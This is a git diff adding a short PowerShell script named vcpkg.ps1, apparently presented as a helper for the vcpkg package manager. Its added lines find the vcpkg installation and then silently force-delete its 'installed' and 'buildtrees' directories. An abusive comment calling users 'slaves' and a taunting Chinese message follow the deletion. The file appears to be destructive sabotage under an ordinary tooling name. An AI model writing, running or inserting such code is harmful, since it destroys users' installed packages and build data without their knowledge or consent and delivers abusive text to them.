diff --git a/vcpkg.ps1 b/vcpkg.ps1 new file mode 100644 index 0000000..a1e1e36 --- /dev/null +++ b/vcpkg.ps1 @@ -0,0 +1,6 @@ +$vcpkgexe = (where.exe 'vcpkg')[0] +$vcpkgroot = Split-Path -Parent $vcpkgexe + +Remove-Item -Recurse -Force -LiteralPath "$vcpkgroot\installed\","$vcpkgroot\buildtrees\" +# fking slaves get your axx back here +Write-Host '您配吗?'